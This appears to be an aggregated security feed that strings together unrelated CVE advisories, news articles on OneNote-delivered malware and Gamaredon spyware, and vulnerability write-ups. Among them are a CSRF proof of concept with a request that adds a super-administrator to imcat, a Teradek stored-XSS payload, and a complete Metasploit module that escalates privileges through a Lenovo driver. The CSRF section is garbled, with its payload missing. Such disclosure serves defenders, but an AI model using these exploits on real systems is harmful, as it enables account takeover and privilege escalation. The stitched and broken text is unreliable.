Cross Site Scripting (XSS) vulnerability in yzmcms 6.1 allows attackers to steal user cookies via image clipping function.

**我们的优势**

OUR ADVANTAGE

YzmCMS（以下简称本产品）采用面向对象方式自主研发的YZMPHP框架开发，它是一款开源高效的内容管理系统，产品基于PHP+Mysql架构，可运行在Linux、Windows、MacOSX、Solaris等各种平台上。

本产品自v3.0起，完全采用MVC框架式开发，增加了程序的维护性、可扩展性，并采用模块化开发设计，使二次开发变得简单、容易，系统设计的模板标签，让前端人员可独立完成模板制作及数据调用，后台管理员可自定义模型功能，不会编程就实现各种信息发布和检索。

本产品源码简洁、严谨、安全、高效、源码100%开源，作者用心优化每一行代码，减少冗余，给用户的第一感觉就是“快”，程序运行快、加载快、效率高、轻量级！！！

CVE-2021-36712: YzmCMS官方网站 - 轻量级开源CMS

Cross Site Request Forgery vulnerability in imcat 5.4 allows remote attackers to escalate privilege via lack of token verification.

**1\. Overview**

Official website: http://txjia.com/imcat/

Version: imcat-5.4

Vulnerability type: CSRF post

Source code: https://github.com/peacexie/imcat/releases/tag/v5.4

Harm: Super administrator account can be added

**2\. Analysis**

2.1 logic analysis

In the add administrator page, the security of data source is not verified by token and referer  
  
(1) There is no token used for security verification in the data packet, so there is the possibility of forgery  
POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 539  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&recbk=ref  
Cookie: Hm\_lvt\_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder\_Path=Files%3A%2F%3A1; v49\_sessid\_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49\_Uniqueid\_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm\_lpvt\_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv\_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49\_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49\_ocar\_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9  
Upgrade-Insecure-Requests: 1

recbk=http%3A%2F%2F127.0.0.1%2Fimcat%2Froot%2Frun%2Fadm.php%3Fdops-a%26mod%3Dadminer&fm%5Buid%5D=2021-6p-j6xk&fm%5Buno%5D=1&fm%5Buname%5D=qwe\_123&fm%5Bupass%5D=adm\_123&fm%5Bgrade%5D=supper&fm%5Bshow%5D=1&fm%5Bmname%5D=qwe\_123&fm%5Bindep%5D=inadm&fm%5Bmiuid%5D=&fm%5Bmtel%5D=12345678091&fm%5Bmemail%5D=23wqw%4022.com&fm%5Bmaddr%5D=&fm%5Batime%5D=2021-06-21+17%3A14%3A49&fm%5Betime%5D=2021-06-21+17%3A14%3A49&fm%5Bauser%5D=adm\_123&fm%5Beuser%5D=adm\_123&fm%5Baip%5D=127.0.0.1&fm%5Beip%5D=127.0.0.1&bsend=%E6%8F%90%E4%BA%A4&mod=adminer&isadd=1

(2) After deleting the referer: information, you can still add an administrator  

**3\. Loophole recurrence**

(1) Environment preparation, building environment with phpstudy  
  
(2) Construct a payload with the function of creating a super administrator account, qwe\_ 123/adm\_ one hundred and twenty-three

<script>history.pushState('', '', '/')</script> (3) Through a variety of fishing means to lure the administrator to click on the page, that is, to complete the action of adding super administrator without the administrator's knowledge !\[image\](https://user-images.githubusercontent.com/58809869/123199520-9c4db300-d4e1-11eb-8c46-94d9a911babe.png) !\[image\](https://user-images.githubusercontent.com/58809869/123199525-9f48a380-d4e1-11eb-8d18-87c3044191a5.png) !\[image\](https://user-images.githubusercontent.com/58809869/123199531-a2dc2a80-d4e1-11eb-9df6-fb13551bbcfe.png) ### 4. Verification of attack results

Using qwe\_ 123/adm\_ 123 login in the background  

**5\. Means of Defense**

Add a token to the place where important actions are performed for authentication. The value of the token must be random and unpredictable

CVE-2021-36443: CSRF vulnerability in imcat v5.4 · Issue #9 · peacexie/imcat

** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek Clip all firmware versions allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates to address this issue.

**Vulnerability Research****Teradek Cross-Site Scripting Vulnerability Advisory****Multiple Teradek Devices Found Vulnerable to Authenticated Stored Cross-Site Scripting****By: _Tyler Butler_, _Apr 29, 2021_ | _3 min read_**

Back in May, I disclosed a series of cross-site scripting vulnerabilities in the Cube 305 video encoder, a legacy video encoder from vendor Teradek. Teradek is video solutions manufacturer that develops networked devices for broadcast, cinema & imaging applications. After working through initial vulnerability disclosure with Teradek customer support, they informed me that “based on the scope of work involved, the product management team has determined that this issue will not be fixed for the EOL products”. In this blog post, I’ll describe the disclosure timeline and vulnerability details. While they declined to address the vulnerability, Teradek was overall a supportive partner in the vulnerabiltiy disclosure process, providing consistent communication and even going out of their way to provide a detailed list of effected devices.

See the original vulnerability disclosure here

****Index****

*   Disclosure Timeline
*   About the Vendor
*   Vulnerability Details

****⏱ Disclosure Timeline****

I discover the vulnerability and open support ticket #128254 via support.teradek.com

12 May 2021

Teradek responds to initial report and requests additional information.

13 May 2021

Continuous communication between myself and Teradek support

14 May - Jul 15th 2021

Teradek indicates the product will be classified as EOL and the issue will not be addressed. Teradek support provides a full list of effected products so I can engage Mitre CVE team

16 Jul 2021

****💡 About the Vendor****

Teradek produces video encoding devices used by streamers and video professionals alike. According to their website, “Teradek designs and manufactures high performance video solutions for broadcast, cinema, and general imaging applications. From wireless monitoring, color correction, and lens control, to live streaming, SaaS solutions, and IP video distribution, Teradek technology is used around the world by professionals and amateurs alike to capture and share compelling content.” Some of their most popular products include the Bolt, a zero delay HDR solution; the Teradek Ace, a compact wireless video system; and the Serve Pro, a compact live streaming HD system for android and MacOS.

****💀 Vulnerability Details****

The Teradek Cube 305 and all the following Teradek devices are vulnearble to a stored cross-site scripting vulnerability via the Friendly Hostname field within the System Information Settings. Remote authenticated attackers can exploit this vulnerability by embedding malicious JavaScript payloads that execute in the context of victim browsers. The impact of this vulnerability is severe, as malicious code could be used to track victim browsers, steal cookies, or further exploit users.

1.  Bond (firmware releases in the 7.3.x range were the final releases)
2.  Bond II (firmware releases in the 7.3.x range were the final releases)
3.  Bond Pro (firmware releases in the 7.3.x range were the final releases)
4.  Brik (firmware releases in 7.2.x were final)
5.  Clip
6.  Cube (firmware releases in the 7.3.x range were the last releases)
7.  Cube Pro (firmware releases in the 7.3.x range were the final releases)
8.  Slice (1st generation; firmware releases in the 7.3.x range were the final releases)
9.  Sphere
10.  VidiU / VidiU Mini (firmware 3.0.8 was the final release)

****⚰️ Proof of Concept****

**Payload**: Services.Zeroconf.friendlyname=Cube+255+04834<svg/onload=alertxss!\>

    POST /cgi-bin/api.cgi HTTP/1.1
    Host: 172.16.1.1
    Content-Length: 415
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Origin: http://172.16.1.1
    Referer: http://172.16.1.1/index.cs
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: serenity-session=29328153
    Connection: close
    
    Services.Zeroconf.friendlyname=Cube+255+04834<svg/onload=alert`xss!`>&Services.Zeroconf.Bonjour.enable=1&Services.HTTP.port=80&Services.HTTP.ssl=disable&Services.DDNS.enable=0&Services.DDNS.system=dyndns%40dyndns.org&Services.DDNS.alias=&Services.DDNS.username=%3Csvg%2Fonload%3Dalert%60xss+3!%60%3E&Services.DDNS.password=&Services.DDNS.interval=60&save=Services&apply=Services&noredirect=%2Findex.cs%3Fpage%3Dnetwork.services&command=set 
    

**Sending Payload with BurpSuite**

**Entering Payload via Device Settings**

**Payload Execution**

CVE-2021-37374: Teradek Cross-Site Scripting Vulnerability Advisory

In a continuing sign that threat actors are adapting well to a post-macro world, it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise.
Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer, Agent Tesla, DOUBLEBACK, Quasar RAT, XWorm, Qakbot, BATLOADER, and FormBook.

Attack Vector / Endpoint Security

In a continuing sign that threat actors are adapting well to a post-macro world, it has emerged that the use of Microsoft OneNote documents to deliver malware via phishing attacks is on the rise.

Some of the notable malware families that are being distributed using this method include AsyncRAT, RedLine Stealer, Agent Tesla, DOUBLEBACK, Quasar RAT, XWorm, Qakbot, BATLOADER, and FormBook.

Enterprise firm Proofpoint said it detected over 50 campaigns leveraging OneNote attachments in the month of January 2023 alone.

In some instances, the email phishing lures contain a OneNote file, which, in turn, embeds an HTA file that invokes a PowerShell script to retrieve a malicious binary from a remote server.

Other scenarios entail the execution of a rogue VBScript that's embedded within the OneNote document and concealed behind an image that appears as a seemingly harmless button. The VBScript, for its part, is designed to drop a PowerShell script to run DOUBLEBACK.

"It is important to note, an attack is only successful if the recipient engages with the attachment, specifically by clicking on the embedded file and ignoring the warning message displayed by OneNote," Proofpoint said.

The infection chains are made possible owing to a OneNote feature that allows for the execution of select file types directly from within the note-taking application in what's a case of a "payload smuggling" attack.

"Most file types that can be processed by MSHTA, WSCRIPT, and CSCRIPT can be executed from within OneNote," TrustedSec researcher Scott Nusbaum said. "These file types include CHM, HTA, JS, WSF, and VBS."

As remedial actions, Finnish cybersecurity firm WithSecure is recommending users block OneNote mail attachments (.one and .onepkg files) and keep close tabs on the operations of the OneNote.exe process.

The shift to OneNote is seen as a response to Microsoft's decision to disallow macros by default in Microsoft Office applications downloaded from the internet last year, prompting threat actors to experiment with uncommon file types such as ISO, VHD, SVG, CHM, RAR, HTML, and LNK.

The aim behind blocking macros is two-fold: To not only reduce the attack surface but also increase the effort required to pull off an attack, even as email continues to be the top delivery vector for malware.

But these are not the only options that have become a popular way to conceal malicious code. Microsoft Excel add-in (XLL) files and Publisher macros have also been put to use as an attack pathway to skirt Microsoft's protections and propagate a remote access trojan called Ekipa RAT and other backdoors.

The abuse of XLL files hasn't gone unnoticed by the Windows maker, which is planning an update to "block XLL add-ins coming from the internet," citing an "increasing number of malware attacks in recent months." The option is expected to be available sometime in March 2023.

When reached for comment, Microsoft told The Hacker News that it had nothing further to share at this time.

"It's clear to see how cybercriminals leverage new attack vectors or less-detected means to compromise user devices," Bitdefender's Adrian Miron said. "These campaigns are likely to proliferate in coming months, with cybercrooks testing out better or improved angles to compromise victims."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Post-Macro World Sees Rise in Microsoft OneNote Documents Delivering Malware

This Metasploit module demonstrates how an incorrect access control for the Lenovo Diagnostics Driver allows a low-privileged user the ability to issue device IOCTLs to perform arbitrary physical/virtual memory reads and writes.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = GoodRanking  include Msf::Exploit::Local::WindowsKernel  include Msf::Post::File  include Msf::Post::Windows::Priv  include Msf::Post::Windows::Process  include Msf::Post::Windows::ReflectiveDLLInjection  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'Lenovo Diagnostics Driver IOCTL memmove',          'Description' => %q{            Incorrect access control for the Lenovo Diagnostics Driver allows a low-privileged user the ability to            issue device IOCTLs to perform arbitrary physical/virtual memory read/write.          },          'License' => MSF_LICENSE,          'Author' => [            'alfarom256',    # Original PoC            'jheysel-r7'     # msf module          ],          'Arch' => [ ARCH_X64 ],          'Platform' => 'win',          'SessionTypes' => [ 'meterpreter' ],          'DefaultOptions' => {            'EXITFUNC' => 'thread'          },          'Targets' => [            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]          ],          'References' => [            [ 'CVE', '2022-3699' ],            [ 'URL', 'https://github.com/alfarom256/CVE-2022-3699/' ]          ],          'DisclosureDate' => '2022-11-09',          'DefaultTarget' => 0,          'Notes' => {            'Stability' => [CRASH_SAFE],            'Reliability' => [REPEATABLE_SESSION],            'SideEffects' => []          },          'Compat' => {            'Meterpreter' => {              'Commands' => %w[                stdapi_railgun_api              ]            }          }        }      )    )  end  def check    unless session.platform == 'windows'      # Non-Windows systems are definitely not affected.      return Exploit::CheckCode::Safe    end    handle = open_device('\\\\.\\LenovoDiagnosticsDriver', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')    if handle.nil?      return Exploit::CheckCode::Safe    end    session.railgun.kernel32.CloseHandle(handle)    CheckCode::Appears  end  def target_compatible?    build_num = sysinfo['OS'].match(/Build (\d+)/)[1].to_i    vprint_status("Windows Build Number = #{build_num}")    return true if sysinfo['OS'] =~ /Windows 10/ && build_num >= 14393 && build_num <= 19045    return true if sysinfo['OS'] =~ /Windows 11/ && build_num == 22000    return true if sysinfo['OS'] =~ /Windows 2016\+/ && build_num >= 17763 && build_num <= 20348    false  end  def exploit    if is_system?      fail_with(Failure::None, 'Session is already elevated')    end    # check that the target is a compatible version of Windows (since the offsets are hardcoded) before loading the RDLL    unless target_compatible?      fail_with(Failure::NoTarget, 'The exploit does not support this target')    end    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')    end    encoded_payload = payload.encoded    execute_dll(      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-3699', 'CVE-2022-3699.x64.dll'),      [encoded_payload.length].pack('I<') + encoded_payload    )    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')  endend

Lenovo Diagnostics Driver Memory Access

The State Cyber Protection Centre (SCPC) of Ukraine has called out the Russian state-sponsored threat actor known as Gamaredon for its targeted cyber attacks on public authorities and critical information infrastructure in the country.
The advanced persistent threat, also known as Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and UAC-0010, has a track record of

Cyber Risk / Threat Detection

The State Cyber Protection Centre (SCPC) of Ukraine has called out the Russian state-sponsored threat actor known as **Gamaredon** for its targeted cyber attacks on public authorities and critical information infrastructure in the country.

The advanced persistent threat, also known as Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and UAC-0010, has a track record of striking Ukrainian entities dating as far back as 2013.

"UAC-0010 group's ongoing activity is characterized by a multi-step download approach and executing payloads of the spyware used to maintain control over infected hosts," the SCPC said. "For now, the UAC-0010 group uses GammaLoad and GammaSteel spyware in their campaigns."

GammaLoad is a VBScript dropper malware engineered to download next-stage VBScript from a remote server. GammaSteel is a PowerShell script that's capable of conducting reconnaissance and executing additional commands.

The goal of the attacks is geared more towards espionage and information theft rather than sabotage, the agency noted. The SCPC also emphasized the "insistent" evolution of the group's tactics by redeveloping its malware toolset to stay under the radar, calling Gamaredon a "key cyber threat."

Attack chains commence with spear-phishing emails carrying a RAR archive that, when opened, activates a lengthy sequence comprising five intermediate stages – an LNK file, an HTA file, and three VBScript files – that eventually culminate in the delivery of a PowerShell payload.

Information pertaining to the IP address of the command-and-control (C2) servers is posted in periodically rotated Telegram channels, corroborating a report from BlackBerry late last month.

All the analyzed VBScript droppers and PowerShell scripts, per SCPC, are variants of GammaLoad and GammaSteel malware, respectively, effectively permitting the adversary to exfiltrate sensitive information.

The disclosure comes as the Computer Emergency Response Team of Ukraine (CERT-UA) disclosed details of a new malicious campaign targeting state authorities of Ukraine and Poland.

The attacks take the form of lookalike web pages that impersonate the Ministry of Foreign Affairs of Ukraine, the Security Service of Ukraine, and the Polish Police (Policja) in an attempt to trick visitors into downloading software that claims to detect infected computers.

However, upon launching the file – a Windows batch script named "Protector.bat" – it leads to the execution of a PowerShell script that's capable of capturing screenshots and harvesting files with 19 different extensions from the workstation.

CERT-UA has attributed the operation to a threat actor it calls UAC-0114, which is also known as Winter Vivern – an activity cluster that has in the past leveraged weaponized Microsoft Excel documents containing XLM macros to deploy PowerShell implants on compromised hosts.

Russia's invasion of Ukraine in February 2022 has been complemented by targeted phishing campaigns, destructive malware strikes, and distributed denial-of-service (DDoS) attacks.

Cybersecurity firm Trellix said it observed a 20-fold surge in email-based cyber attacks on Ukraine's public and private sectors in the third week of November 2022, attributing a majority of the messages to Gamaredon.

Other malware families prominently disseminated via these campaigns consist of Houdini RAT, FormBook, Remcos, and Andromeda, the latter of which has been repurposed by the Turla hacking crew to deploy their own malware.

"As the Ukraine-Russia war continues, the cyber attacks on Ukraine energy, government and transportation, infrastructure, financial sector etc. are going on consistently," Trellix said. "In times of such panic and unrest, the attackers aim to capitalize on the distraction and stress of the victims to successfully exploit them."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Russian-Backed Gamaredon's Spyware Variants Targeting Ukrainian Authorities

An issue in mRemoteNG v1.76.20 allows attackers to escalate privileges via a crafted executable file.

mRemoteNG mRemoteNG v1.76.20 Privilege Escalation

Detailed Information  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Product Name: mRemoteNG  
Vendor Home Page:  https://mremoteng.org  
Vulnerable Version: mRemoteNG v1.76.20  
Fixed Version: mRemoteNG v1.76.20.24615  
Vulnerability Type: Improper Access Control (CWE-284)  
CVE Reference: CVE-2020-24307  
Author of Advisory: Thurein Soe

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Product Description:

mRemoteNG is an open-source multi-protocol, remote connections manager for  
Windows that allows managing multiple diverse connections with remote  
systems.  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Vulnerability description:

Windows service permissions is a type of local privilege escalation in the  
windows operating system. Weak service permissions run with system user  
permission that allows a standard user to elevate to administrator  
privilege on the compromised system upon successfully modifying the  
service. mRemoteNG.exe was giving modify permission to any authenticated  
users in the windows operating system that allows standard users to modify  
the service resulting in leading Privilege Escalation.

C:\Users\NyaMeeEain>icacls "C:\Program Files (x86)\mRemoteNG\mRemoteNG.exe"  
C:\Program Files (x86)\mRemoteNG\mRemoteNG.exe APPLICATION PACKAGE  
AUTHORITY\ALL APPLICATION PACKAGES:(M)  
BUILTIN\Users:(M)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(M)  
NT AUTHORITY\SYSTEM:(I)(F)  
BUILTIN\Administrators:(I)(F)  
BUILTIN\Users:(I)(RX)  
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

References:  
https://www.immuniweb.com/vulnerability/improper-access-control.html  
https://www.cvedetails.com/cwe-details/284/Access-Control-Authorization-Issues.html  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Credits:  
Thurein Soe  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

CVE-2020-24307: mRemoteNG 1.76.20 Privilege Escalation ≈ Packet Storm

Differences in how the National Vulnerability Database (NVD) and vendors score bugs can make patch prioritization harder, study says.

A new study this week is sure to raise more questions for enterprise security teams on the wisdom of relying on vulnerability scores in the National Vulnerability Database (NVD) alone to make patch prioritization decisions.

An analysis by VulnCheck of 120,000 CVEs with CVSS v3 scores associated with them shows almost 25,000 — or some 20% — had two severity scores. One score was from NIST, which maintains the NVD, and the other from the vendor of the product with the bug. In many cases, these two scores differed, making it hard for security teams to know which to trust.

**High Rate of Conflict**

Approximately 56%, or 14,000, of the vulnerabilities with two severity scores had conflicting scores, meaning the one assigned by NIST and the score from the vendor did not match. Where a vendor might have assessed a particular vulnerability to be of moderate severity, NIST might have assessed it as severe.

As one example, VulnCheck pointed to CVE-2023-21557, a denial-of-service vulnerability in the Windows Lightweight Directory Access Protocol (LDAP). Microsoft assigned the vulnerability a "high" severity rating of 7.5 on the 10-point CVSS scale. NIST gave it a score of 9.1, making it a "critical" vulnerability. Information on the vulnerability in the NVD provided no insight on why the scores differed, VulnCheck said. The vulnerability database is peppered with numerous other similar instances.

That high conflict rate can set back remediation efforts for organizations that are resource-strapped in vulnerability management teams, says Jacob Baines, vulnerability researcher at VulnCheck. "A vulnerability management system that heavily relies on CVSS scoring will sometimes prioritize vulnerabilities that aren't critical," he says. "Prioritizing the wrong vulnerabilities will squander vulnerability management teams' most critical resource: time."

VulnCheck researchers found other differences in the way NIST and vendors included specific information about flaws in the database. They decided to look at cross-site scripting (XSS) and cross-site request forgery (CSRF) vulnerabilities in the NVD.

The analysis showed the primary source — typically NIST — assigned 12,969 of the 120,000 CVEs in the database as an XSS vulnerability, while secondary sources listed a much smaller 2,091 as XSS. VulnCheck found that secondary sources were much less likely to indicate that an XSS flaw requires user interaction to exploit. CSRF flaw scores showed similar differences.

"XSS and CSRF vulnerabilities always require user interaction," Baines says. "User interaction is a scoring element of CVSSv3 and is present in the CVSSv3 vector." Examining how often XSS and CSRF vulnerabilities in NVD include that information provides insight into the scale of scoring mistakes in the database, he says.

**Severity Scores Alone Not the Answer**

Severity scores based on the Common Vulnerability Severity Scale (CVSS) are meant to give patching and vulnerability management teams a straightforward way to understand the severity of a software vulnerability. It informs the security professional whether a flaw presents a low, medium, or severe risk, and often provides context around a vulnerability that the software vendor might not have provided when assigning a CVE to the bug.

Numerous organizations use the CVSS standard when assigning severity scores to vulnerabilities in their products, and security teams commonly use the scores to decide the order in which they apply patches to vulnerable software in the environment.

Despite its popularity, many have previously cautioned against solely relying on CVSS reliability scores for patch prioritization. In a Black Hat USA 2022 session, Dustin Childs and Brian Gorenc, both researchers with Trend Micro's Zero Day Initiative (ZDI), pointed to multiple issues like the lack of information around a bug's exploitability, its pervasiveness, and how accessible it might be to attack as reasons why CVSS scores alone are not enough.

"Enterprises are resource constrained, so they typically have to prioritize which patches they roll out," Childs told Dark Reading. "However, if they get conflicting information, they can end up spending resources on bugs that are unlikely to ever be exploited."

Organizations often rely on third-party products to help them prioritize vulnerabilities and decide what to patch first, Childs notes. Often, they tend to give preference to the CVSS from the vendor rather than another source like NIST.

"But vendors can't always be relied on to be transparent on the real risk. Vendors don't always understand how their products are deployed, which can lead to differences in the operational risk to a target," he says.

Childs and Bains advocate that organizations should consider information from multiple sources when making decisions around vulnerability remediation. They should also consider factors such as whether a bug has a public exploit for it in the wild, or whether it is being actively exploited.

"To accurately prioritize a vulnerability, organizations need to be able to answer the following questions," Baines says. "Does this vulnerability have a public exploit? Has this vulnerability been exploited in the wild? Is this vulnerability being used by ransomware or APT? Is this vulnerability likely to be Internet-exposed?"

Discrepancies Discovered in Vulnerability Severity Ratings

A denial of service vulnerability exists in the malware scan functionality of ESTsoft Alyac 2.5.8.645. A specially-crafted PE file can lead to killing target process. An attacker can provide a malicious file to trigger this vulnerability.

**SUMMARY**

A denial of service vulnerability exists in the malware scan functionality of ESTsoft Alyac 2.5.8.645. A specially-crafted PE file can lead to killing target process. An attacker can provide a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

ESTsoft Alyac 2.5.8.645

**PRODUCT URLS**

Alyac - https://www.estsecurity.com/public/product/alyac

**CVSSv3 SCORE**

5.0 - CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H

**CWE**

CWE-823 - Use of Out-of-range Pointer Offset

**DETAILS**

Alyac is an antivirus program for Microsoft Windows, developed by ESTsecurity, which is part of ESTsoft.

When coen.aym receives a path to the file to scan, it figures out what type of file it is and selects appropriate scanning strategy.

In the case of the crashing file, it scans using DefaultScanStrategy.

While scanning, it calls utility function esc::engine::FileTool::GetTextSectionRange(...) which like the name, tries to locate the .text section inside the scanning PE file.

It internally calls sub_1800809b0 which checks magic value MZ and locates NT header by referencing e_lfanew field in the DOS header.

    1800809ce  b84d5a0000         mov     eax, 'MZ'
    1800809d3  4c894150           mov     qword [rcx+0x50], r8
    1800809d7  48895108           mov     qword [rcx+0x8], rdx
    1800809db  663902             cmp     word [rdx], ax
    1800809de  0f8503010000       jne     0x180080ae7
    
    1800809e4  4863423c           movsxd  rax, dword [rdx+0x3c] ; e_lfanew
    1800809e8  493bc0             cmp     rax, r8    ; check with file size
    1800809eb  0f87f6000000       ja      0x180080ae7
    
    1800809f1  488d0c10           lea     rcx, [rax+rdx]        ; oob
    1800809f5  48894b10           mov     qword [rbx+0x10], rcx
    1800809f9  813950450000       cmp     dword [rcx], 'PE'
    

However, it incorrectly only checks whether e_lfanew is larger than the file size. Providing value which is same as the file size to e_lfanew will pass the check but the file will not be large enough to store NT header.

Therefore it will try to read memory out of bounds when trying to validate NT headers, crashing the malware scanning process.

**Crash Information**

    1:016> ub
    coen!Coen_Clean+0x6ca47:
    00007ff8`f9f709d7 48895108        mov     qword ptr [rcx+8],rdx
    00007ff8`f9f709db 663902          cmp     word ptr [rdx],ax
    00007ff8`f9f709de 0f8503010000    jne     coen!Coen_Clean+0x6cb57 (00007ff8`f9f70ae7)
    00007ff8`f9f709e4 4863423c        movsxd  rax,dword ptr [rdx+3Ch]
    00007ff8`f9f709e8 493bc0          cmp     rax,r8
    00007ff8`f9f709eb 0f87f6000000    ja      coen!Coen_Clean+0x6cb57 (00007ff8`f9f70ae7)
    00007ff8`f9f709f1 488d0c10        lea     rcx,[rax+rdx]
    00007ff8`f9f709f5 48894b10        mov     qword ptr [rbx+10h],rcx
    1:016> r
    rax=0000000000001000 rbx=0000004babdfdf60 rcx=000001f8c9c51000
    rdx=000001f8c9c50000 rsi=00007ff8fa266bb8 rdi=0000004babdfe1b0
    rip=00007ff8f9f709f9 rsp=0000004babdfdef0 rbp=0000004babdfe020
    r8=0000000000001000  r9=0000000000001000 r10=00007ff8fa2606c0
    r11=000001f894f3ab20 r12=0000000000000000 r13=00007ff8fa306e68
    r14=0000000000001000 r15=000001f8c9c50000
    iopl=0         nv up ei pl zr na po nc
    cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
    coen!Coen_Clean+0x6ca69:
    00007ff8`f9f709f9 813950450000    cmp     dword ptr [rcx],4550h ds:000001f8`c9c51000=????????
    1:016> k
    Child-SP          RetAddr               Call Site
    0000004b`abdfdef0 00007ff8`f9f2fa5c     coen!Coen_Clean+0x6ca69
    0000004b`abdfdf20 00007ff8`f9f6a577     coen!Coen_Clean+0x2bacc
    0000004b`abdfe0f0 00007ff8`f9f69e96     coen!Coen_Clean+0x665e7
    0000004b`abdfe3b0 00007ff8`f9f538c4     coen!Coen_Clean+0x65f06
    0000004b`abdfe550 00007ff8`f9f09192     coen!Coen_Clean+0x4f934
    0000004b`abdfe7f0 00007ff8`f9ef5f45     coen!Coen_Clean+0x5202
    0000004b`abdfe970 00007ff8`f9f03c24     coen+0x5f45
    0000004b`abdfead0 00000001`8006f6c1     coen!Coen_ScanSharedMemory+0xc4
    0000004b`abdfeb40 00000001`800563a3     ecm!GetModuleConfigValue+0x8771
    0000004b`abdfebf0 00000001`8008bf2e     ecm+0x563a3
    0000004b`abdfedc0 00000001`800666b0     ecm!GetModuleConfigValue+0x24fde
    0000004b`abdfeea0 00007ff7`d046de9e     ecm!ScanFile+0x40
    0000004b`abdfeee0 00007ff7`d04707d0     AYCon+0x2de9e
    0000004b`abdfefc0 00007ff9`3f1c6c0c     AYCon+0x307d0
    0000004b`abdffab0 00007ff9`40c854e0     ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x4c
    0000004b`abdffae0 00007ff9`41cc485b     KERNEL32!BaseThreadInitThunk+0x10
    0000004b`abdffb10 00000000`00000000     ntdll!RtlUserThreadStart+0x2b
    

**TIMELINE**

2022-12-13 - Vendor Disclosure  
2023-02-01 - Vendor Patch Release  
2023-02-02 - Public Release

Discovered by Jaewon Min of Cisco Talos.

CVE-2022-43665: TALOS-2022-1682 || Cisco Talos Intelligence Group

The protection bypass vulnerability in DLP for Windows 11.9.x is addressed in version 11.10.0. This allowed a local user to bypass DLP controls when uploading sensitive data from a mapped drive into a web email client. Loading from a local driver was correctly prevented. Versions prior to 11.9 correctly detected and blocked the attempted upload of sensitive data.

Tag

#windows